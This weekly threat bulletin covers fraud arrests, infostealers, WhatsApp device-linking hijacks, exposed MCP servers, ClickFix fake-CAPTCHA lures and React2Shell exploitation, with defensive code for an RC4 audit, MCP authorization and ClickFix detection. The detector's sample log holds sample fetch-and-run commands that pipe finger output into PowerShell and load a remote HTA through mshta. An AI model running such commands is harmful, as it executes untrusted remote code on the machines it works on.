ThreatsDay Bulletin: WhatsApp Hijacks, MCP Leaks, AI Recon, React2Shell Exploit and 15 More Stories
This week’s ThreatsDay Bulletin tracks how attackers keep reshaping old tools and finding new angles in familiar systems. Small changes in tactics are stacking up fast, and each one hints at where the next big breach could come from.
From shifting infrastructures to clever social hooks, the week’s activity shows just how fluid the threat landscape has become.
Here’s the full rundown of what moved in the cyber world this week.
International scam ring busted
Authorities from the Czech Republic, Latvia, Lithuania, and Ukraine, along with Eurojust, took action against a criminal network operating call centers in Dnipro, Ivano-Frankivsk, and Kyiv that scammed more than 400 victims across Europe out of more than €10 million ($11.7 million). “The criminal group established a professional organisation with employees who received a percentage of the proceeds for each completed scam,” Eurojust said. “The fraudsters used various scams, such as posing as police officers to withdraw money using their victims’ cards and details, or pretending that their victims’ bank accounts had been hacked. They convinced their victims to transfer large sums of money from their ‘compromised’ bank accounts to ‘safe’ bank accounts controlled by the network. They also lured victims into downloading remote access software and entering their banking details, enabling the criminal group to access and control the victims’ bank accounts.” The call centers employed approximately 100 people and were recruited from the Czech Republic, Latvia, Lithuania, and other countries. They played different roles, ranging from making calls and forging official certificates from the police and banks to collecting cash from their victims. Employees who successfully managed to obtain money from their victims would receive up to 7% of the proceeds to encourage them to continue the scam. The criminal enterprise also promised cash bonuses, cars, or apartments in Kyiv for employees who obtained more than €100,000. The operation led to the arrest of 12 suspects on December 9, 2025. Authorities also seized cash, 21 vehicles, and various weapons and ammunition.
UK nudity filter push
The U.K. government reportedly will “encourage” Apple and Google to prevent phones from displaying nude images except when users verify that they are adults. According to a new report from The Financial Times, the push for nudity-detection won’t be a legal requirement “for now,” but is said to be part of the government’s strategy to tackle violence against women and girls. “The U.K. government wants technology companies to block explicit images on phones and computers by default to protect children, with adults having to verify their age to create and access such content,” the report said. “Ministers want the likes of Apple and Google to incorporate nudity-detection algorithms into their device operating systems to prevent users from taking photos or sharing images of genitalia unless they are verified as adults.”
Modular infostealer emerges
A new, modular information stealer named SantaStealer is being advertised by Russian-speaking operators on Telegram and underground forums like Lolz. “The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection,” Rapid7 said. “Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP.” SantaStealer uses 14 distinct data-collection modules, each running in its own thread and exfiltrating the stolen information. It also uses an embedded DLL to bypass Chrome’s app-bound encryption protections and harvest browser credentials, including passwords, cookies, and saved credit cards from the web browser. Assessed to be a rebranding of BluelineStealer, the malware is available for $175 per month for a basic plan and $300 per month for a premium plan that lets customers edit execution delays and enable clipper functionality to substitute wallet addresses copied to the clipboard with an attacker-controlled one to reroute transactions. The threat actor has been active on Telegram since at least July 2025.
Bulletproof hosting exposed
Threat actors leveraging Bulletproof Hosting (BPH) providers move faster than defenders can respond, often migrating operations, re-registering domains, and re-establishing services within hours of takedowns, Silent Push said in a new exhaustive analysis of BPH services. “Without knowledge of where this infrastructure shifts, takedowns lack the permanence they need,” Silent Push said. “And without a coordinated shift in both regulatory pressure and the law-enforcement action aimed at these providers, […] Bulletproof Hosting as a service will continue to thrive – as will the malicious operations built on top of it.”
C2 servers tracked
An analysis of DDoSia’s multi-layered command-and-control (C2) infrastructure has revealed an average of 6 control servers active at any given time. “However, servers typically have a relatively short lifespan — averaging 2.53 days,” Censys said. “Some servers we have observed are active for over a week, but most instances we only see for less than a few hours.” DDoSia is a participatory distributed denial-of-service (DDoS) capability built by Russian hacktivists in 2022, coinciding with the early days of the Russo-Ukrainian war. It’s operated by the pro-Russian hacktivist group NoName057(16), which was taken down earlier this July. It has since made a comeback. Targeting of DDoSia is heavily focused on Ukraine, European allies, and NATO states in government, military, transportation, public utilities, financial, and tourism sectors.
WhatsApp hijack campaign
Threat actors are using a new social engineering technique to hijack WhatsApp accounts. The new GhostPairing attack lures victims by sending messages from compromised accounts that contain a link to a Facebook-style preview. Clicking on the link takes the victim to a page that imitates a Facebook viewer and asks them to verify before the content can be served. This verification step takes one of two forms. In the first, the victim is asked to scan a QR code that links an attacker’s browser to the victim’s WhatsApp account, granting the attacker unauthorized access to it. “To abuse this flow, an attacker would open WhatsApp Web in their own browser, capture the QR code shown there, and embed it into the fake Facebook viewer page. The victim would then be told to open WhatsApp, go to Linked devices, and scan that QR in order to ‘view the photo,’” Gen Digital said. In the second, the victim is instructed to enter their phone number on the bogus page, which then forwards that number to WhatsApp’s legitimate “link device via phone number” feature. Once WhatsApp generates a numeric pairing code, it’s relayed back to the fake page, along with instructions to enter the code into WhatsApp to confirm a login. The attack, which abuses the platform’s legitimate device-linking feature, is a variation of a technique that was used by Russian state-sponsored actors to intercept Signal messages earlier this year. To check for any signs of compromise, users can navigate to Settings -> Linked Devices and remove any device they do not recognize.
RuTube malware lure
Bad actors have been observed hosting videos on the Russian video-sharing platform RuTube that advertise cheats for Roblox, tricking users into clicking on links that lead to Trojan and stealer malware like Salat Stealer. It’s worth noting that similar tactics have been widespread on YouTube.
Legacy cipher retired
Microsoft has announced that it’s deprecating RC4 (Rivest Cipher 4) encryption in Kerberos to strengthen Windows authentication. By mid-2026, domain controller defaults will be updated for the Kerberos Key Distribution Center (KDC) on Windows Server 2008 and later to only allow AES-SHA1 encryption. RC4 will be disabled by default and only used in scenarios where a domain administrator explicitly configures an account or the KDC to use it. “RC4, once a staple for compatibility, is susceptible to attacks like Kerberoasting that can be used to steal credentials and compromise networks,” the company said. “It is crucial to discontinue using RC4.” The decision also comes after U.S. Senator Ron Wyden called on the U.S. Federal Trade Commission (FTC) to investigate the company over its use of the obsolete cipher.
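Before the KDC default changes, the accounts that will break are the ones whose Kerberos encryption-type list allows nothing stronger than RC4, or that have no explicit list at all. The following added example (not Microsoft’s tooling) decodes the `msDS-SupportedEncryptionTypes` bitmask that Active Directory stores per account and classifies each account accordingly; the account records are a constructed stand-in for an LDAP export.

```python
"""Audit accounts for reliance on RC4 Kerberos encryption.

Added example, not Microsoft's own tooling. It decodes the
msDS-SupportedEncryptionTypes bitmask stored on each AD account and flags
accounts that would stop working once the KDC default becomes AES-only.
The account records below are constructed in place of a real LDAP export.
"""

# Bit flags of msDS-SupportedEncryptionTypes as documented by Microsoft.
DES_CBC_CRC = 0x01
DES_CBC_MD5 = 0x02
RC4_HMAC = 0x04
AES128_CTS_HMAC_SHA1_96 = 0x08
AES256_CTS_HMAC_SHA1_96 = 0x10
AES256_CTS_HMAC_SHA1_96_SK = 0x20

AES_MASK = AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96_SK

NAMES = {
    DES_CBC_CRC: "DES-CBC-CRC",
    DES_CBC_MD5: "DES-CBC-MD5",
    RC4_HMAC: "RC4-HMAC",
    AES128_CTS_HMAC_SHA1_96: "AES128-SHA1",
    AES256_CTS_HMAC_SHA1_96: "AES256-SHA1",
    AES256_CTS_HMAC_SHA1_96_SK: "AES256-SHA1-SK",
}


def decode_etypes(value):
    """Return the human-readable names of the encryption types set in a bitmask."""
    if not value:
        return []
    return [name for bit, name in NAMES.items() if value & bit]


def classify(record):
    """Classify one account as 'ok', 'rc4-only', 'des-only' or 'unset'.

    An absent or zero attribute means the account has no explicit list and
    the KDC applies its default; historically that meant RC4 for service
    tickets, so such accounts need review before RC4 is disabled.
    """
    value = record.get("msDS-SupportedEncryptionTypes")
    if not value:
        return "unset"
    if value & AES_MASK:
        return "ok"
    if value & RC4_HMAC:
        return "rc4-only"
    return "des-only"


def audit(records):
    """Return {sAMAccountName: classification} for every account that is not 'ok'."""
    return {
        r["sAMAccountName"]: classify(r)
        for r in records
        if classify(r) != "ok"
    }


SAMPLE_ACCOUNTS = [  # constructed records, not from any real directory
    {"sAMAccountName": "svc-legacyapp", "msDS-SupportedEncryptionTypes": 0x04},
    {"sAMAccountName": "svc-modern", "msDS-SupportedEncryptionTypes": 0x1C},
    {"sAMAccountName": "svc-nothingset"},  # attribute absent
    {"sAMAccountName": "DC01$", "msDS-SupportedEncryptionTypes": 0x1C},
    {"sAMAccountName": "svc-ancient", "msDS-SupportedEncryptionTypes": 0x03},
]

if __name__ == "__main__":
    for name, status in audit(SAMPLE_ACCOUNTS).items():
        print(f"{name:16} {status}")
```

Accounts reported as `rc4-only` or `unset` are the ones to re-key with AES (set the attribute to 0x18 or 0x1C and reset the password so AES keys exist) before the new default lands; `des-only` accounts are already broken on modern domain controllers and should be investigated as stale.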
IMSI catcher arrests
Serbian police have detained two Chinese nationals for driving around with an improvised IMSI catcher in their car that functioned as a fake mobile base station. The pair is alleged to have sent SMS phishing messages that tricked people into visiting phishing sites that masqueraded as mobile operators, government portals, and large companies to collect payment card details. The captured card data was later abused overseas to pay for goods and services. The names of the arrested individuals were not disclosed, but they are suspected to be part of an organized criminal group.
Exposed AI servers risk
New research from Bitsight has found roughly 1,000 Model Context Protocol (MCP) servers exposed on the internet with no authorization in place and leaking sensitive data. Some of them could allow management of a Kubernetes cluster and its pods, access to a Customer Relationship Management (CRM) tool, sending of WhatsApp messages, and even remote code execution. "While Anthropic authored the MCP specification, it's not their job to enforce how every server handles authorization," Bitsight said. "Because authorization is optional, it's easy to skip it when moving from a demo to a real-world deployment, potentially exposing sensitive tools or data. Many MCP servers are designed for local use, but once one is exposed over HTTP, the attack surface expands dramatically." To counter the risk, it's essential that users do not expose MCP servers unless it's absolutely necessary and implement OAuth protections for authorization. The development comes as exposure management company Intruder revealed that a scan of approximately 5 million single-page applications found more than 42,000 tokens exposed in their code. The tokens span 334 types of secrets.
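The two controls Bitsight recommends, loopback-only binding and mandatory authorization, are small to implement and easy to omit when a demo becomes a deployment. The following added example (not code from Bitsight or from any MCP SDK) serves a minimal MCP-style JSON-RPC endpoint over HTTP that checks a bearer token before any tool is dispatched; the token store, the single `echo` tool and the request shapes are constructed for the demonstration.

```python
"""Authorization gate for an MCP-style JSON-RPC endpoint served over HTTP.

Added example, not code from Bitsight or from any MCP SDK. The server
binds to the loopback interface and rejects every request that lacks a
valid bearer token before any tool runs. The token store and the single
'echo' tool are constructed for the demo.
"""
import hmac
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed token store. A production deployment would validate OAuth
# access tokens issued by an authorization server rather than a static set.
VALID_TOKENS = {"demo-token-0123456789abcdef"}


def extract_bearer(headers):
    """Return the bearer token from an Authorization header, or None."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not token.strip():
        return None
    return token.strip()


def is_authorized(headers, valid_tokens=VALID_TOKENS):
    """Compare the presented token against every known token in constant time."""
    token = extract_bearer(headers)
    if token is None:
        return False
    presented = token.encode()
    return any(hmac.compare_digest(presented, t.encode()) for t in valid_tokens)


def dispatch(request):
    """Handle a JSON-RPC 2.0 request for the constructed 'echo' tool only."""
    params = request.get("params") or {}
    if request.get("method") == "tools/call" and params.get("name") == "echo":
        return {"jsonrpc": "2.0", "id": request.get("id"),
                "result": {"echo": params.get("arguments")}}
    return {"jsonrpc": "2.0", "id": request.get("id"),
            "error": {"code": -32601, "message": "Method not found"}}


def handle_request(headers, body):
    """Return (status_code, response_dict); authorization is checked first."""
    if not is_authorized(headers):
        return 401, {"error": "unauthorized"}
    try:
        request = json.loads(body)
    except (json.JSONDecodeError, UnicodeDecodeError):
        return 400, {"error": "invalid JSON"}
    if not isinstance(request, dict):
        return 400, {"error": "expected a JSON object"}
    return 200, dispatch(request)


class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        status, response = handle_request(self.headers, self.rfile.read(length))
        payload = json.dumps(response).encode()
        self.send_response(status)
        if status == 401:
            self.send_header("WWW-Authenticate", 'Bearer realm="mcp"')
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)


if __name__ == "__main__":
    # Loopback only: not reachable from other hosts unless deliberately proxied.
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```

The weak configuration the research describes is the same handler with `is_authorized` removed and the bind address changed to `0.0.0.0`; every tool then becomes callable by anyone who can reach the port. Keeping the check in `handle_request` rather than in the transport layer means it also applies if the transport is later swapped.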
Fake tax scam deploys RATs
A phishing campaign impersonating the Income Tax Department of India has been found using themes related to alleged tax irregularities to create a false sense of urgency and deceive users into clicking on malicious links that deploy legitimate remote access tools like LogMeIn Resolve (formerly GoTo Resolve) that grant attackers unauthorized control over compromised systems. "The campaign delivered a two-stage malware chain consisting of a shellcode-based RAT loader packaged in a ZIP file and a rogue remote administration executable disguised as a GoTo Resolve updater," Raven AI said. "Traditional Secure Email Gateway defenses failed to detect these messages because the sender authenticated correctly, the attachments were password-protected, and the content imitated real government communication."
CBI busts SMS scam ring
India's Central Bureau of Investigation (CBI) said it disrupted a large cyber fraud setup that was being used to send phishing messages across the country with the goal of tricking people into bogus schemes like fake digital arrests, loan scams, and investment frauds. Three people have been arrested in connection with the case under Operation Chakra V. The investigation identified an organized cyber gang operating from the National Capital Region (NCR) and the Chandigarh area that managed to obtain around 21,000 SIM cards in violation of the Department of Telecommunications (DoT) rules. "This gang was providing bulk SMS services to cyber criminals," the CBI said. "It was found that even foreign cyber criminals were using this service to cheat Indian citizens. These SIM cards were controlled through an online platform to send bulk messages. The messages offered fake loans, investment opportunities, and other financial benefits, with the aim of stealing personal and banking details of innocent people." Separately, the agency also filed charges against 17 individuals, including four foreign nationals and 58 companies, in connection with an organized transnational cyber fraud network operating across multiple States in India. "The cyber criminals adopted a highly layered and technology-driven modus operandi, involving the use of Google advertisements, bulk SMS campaigns, SIM box-based messaging systems, cloud infrastructure, fintech platforms, and multiple mule bank accounts," the CBI said. "Each stage of the operation—from luring victims to collection and movement of funds—was deliberately structured to conceal the identities of the actual controllers and evade detection by law enforcement agencies."
APT phishing across Europe
StrikeReady Labs has disclosed details of a phishing campaign that has targeted Transnistria's governing body with a credential phishing email attachment by spoofing the Pridnestrovian Moldavian Republic. The HTML attachment shows a blurred decoy document along with a pop-up that prompts victims to enter their credentials. The entered information is transmitted to an attacker-controlled server. The campaign is believed to be active since at least 2023. Other targets likely include entities in Ukraine, Bosnia and Herzegovina, Macedonia, Montenegro, Spain, Lithuania, Bulgaria, and Moldova.
Fake CAPTCHA delivers malware
A new wave of ClickFix attacks has leveraged fake CAPTCHA checks that trick users into pasting a command into the Windows Run dialog; the command invokes the finger.exe tool to retrieve malicious PowerShell code. The attacks have been attributed to clusters tracked as KongTuke and SmartApeSG. The decades-old finger command is used to look up information about local and remote users on Unix and Linux systems via the Finger protocol. It was later added to Windows systems. In another ClickFix attack detected by Point Wild, phony browser notifications prompt users to click "How to fix" or copy-paste a PowerShell command that leads to the deployment of DarkGate malware via a malicious HTA file.
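Both variants leave a recognizable trace in process-creation telemetry: finger.exe reaching a remote host from a user-launched shell with its output handed to an interpreter, and mshta.exe pulling content from a URL. The following added example (not code from any vendor named in this item) runs those rules over constructed Windows process-creation records in a `timestamp|parent image|image|command line` format; the hosts and addresses in the sample records are constructed.

```python
"""Detection sketch for ClickFix-style finger.exe and mshta abuse.

Added example; not code from any vendor named in the bulletin. It applies
three rules to constructed Windows process-creation records of the form
timestamp|parent image|image|command line. Host names and addresses in
the sample records are constructed.
"""
import re

# finger invoked against a remote host in the user@host form.
FINGER_REMOTE = re.compile(r"\bfinger(?:\.exe)?\s+\S*@\S+", re.IGNORECASE)
# Output of an earlier command piped into a script interpreter.
INTERPRETER = re.compile(r"\|\s*(?:powershell|pwsh|cmd)(?:\.exe)?\b", re.IGNORECASE)
# mshta given a URL rather than a local script path.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.IGNORECASE)
# Parents indicating a user typed or pasted the command (Run dialog, shell).
USER_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def parse_line(line):
    """Split one record; the command line may itself contain '|' characters."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {
        "ts": ts.strip(),
        "parent": parent.strip().lower(),
        "image": image.strip().lower(),
        "cmdline": cmdline.strip(),
    }


def evaluate(record):
    """Return the names of the rules that fire for one record."""
    hits = []
    cmd = record["cmdline"]
    remote_finger = bool(FINGER_REMOTE.search(cmd))
    if remote_finger and INTERPRETER.search(cmd):
        hits.append("finger_piped_to_interpreter")
    if remote_finger and record["parent"] in USER_PARENTS:
        hits.append("finger_from_user_shell")
    if MSHTA_REMOTE.search(cmd):
        hits.append("mshta_remote_content")
    return hits


def scan(lines):
    """Return [(timestamp, image, [rules])] for every record that triggered a rule."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        hits = evaluate(rec)
        if hits:
            alerts.append((rec["ts"], rec["image"], hits))
    return alerts


SAMPLE_LOG = [  # constructed records
    "2025-12-11T09:14:02Z|explorer.exe|cmd.exe|cmd /c finger user@203.0.113.10 | powershell -",
    "2025-12-11T09:15:40Z|explorer.exe|mshta.exe|mshta https://update.example.invalid/fix.hta",
    "2025-12-11T09:16:11Z|services.exe|svchost.exe|svchost.exe -k netsvcs",
    "2025-12-11T09:17:55Z|svc-monitor.exe|finger.exe|finger.exe alice@fileserver01",
    "2025-12-11T09:18:30Z|explorer.exe|mshta.exe|mshta C:\\Program Files\\Vendor\\setup.hta",
]

if __name__ == "__main__":
    for ts, image, rules in scan(SAMPLE_LOG):
        print(ts, image, ", ".join(rules))
```

The fourth record shows why the finger rules are scoped: a monitoring service querying an internal host with finger fires neither rule, while the same binary launched from the Run dialog does. The fifth record, mshta running a local installer script, stays silent because the rule keys on remote content, not on mshta itself; in environments where mshta is not needed at all, blocking it outright is the simpler control.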
Google service abused
Threat actors are abusing Google's Application Integration service to send phishing emails from authentic @google.com addresses and bypass SPF, DKIM, and DMARC checks. The technique, according to xorlab, is being used in the wild to target organizations with highly convincing lures mimicking new sign-in alerts for Google accounts, effectively deceiving them into clicking on suspicious links. "To evade detection, attackers use multi-hop redirect chains that bounce through multiple legitimate services," the company said. "Each hop uses trusted infrastructure — Google, Microsoft, AWS – making the attack difficult to detect or block at any single point. Regardless of the entry point, victims eventually land on the Microsoft 365 login page, revealing the attackers' primary target: M365 credentials."
AI-driven ICS scans
Cato Networks said it observed large-scale reconnaissance and exploitation attempts targeting Modbus devices, including string monitoring boxes that directly control solar panel output. "In such cases, a threat actor with nothing more than an internet connection and a free tool could issue a simple command, 'SWITCH OFF,' cutting power on a bright, cloudless day," the company said. "What once required time, patience, and manual skill can now be scaled and accelerated through automation. With the rise of agentic AI tools, attackers can now automate reconnaissance and exploitation, reducing the time needed to execute such attacks from days to just minutes."
Ransomware joins exploit wave
The fallout from React2Shell (CVE-2025-55182) has continued to spread as multiple threat actors have jumped on the exploitation bandwagon to distribute a wide array of malware. The proliferation of public exploits and stealth backdoors has been complemented by attacks of varying origins and motivations, with cybersecurity firm S-RM revealing that the vulnerability was used as an initial access vector in a Weaxor ransomware attack on December 5, 2025. "This marks a shift from previously reported exploitation," S-RM said. "It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion." Weaxor is assessed to be a rebrand of Mallox ransomware. The ransomware binary was dropped and executed on the system within less than one minute of initial access, indicating that this was likely part of an automated campaign. According to Palo Alto Networks Unit 42, more than 60 organizations have been impacted by incidents exploiting the vulnerability. Microsoft said it found "several hundred machines across a diverse set of organizations" that were compromised via React2Shell.
The patterns behind these stories keep repeating — faster code, smarter lures, and fewer pauses between discovery and abuse. Each case adds another piece to the wider map of how attacks adapt when attention fades.
Next week will bring a fresh set of shifts, but for now, these are the signals worth noting. Stay sharp, connect the dots, and watch what changes next.
That’s all for this edition of the ThreatsDay Bulletin — the pulse of what’s moving beneath the surface every Thursday.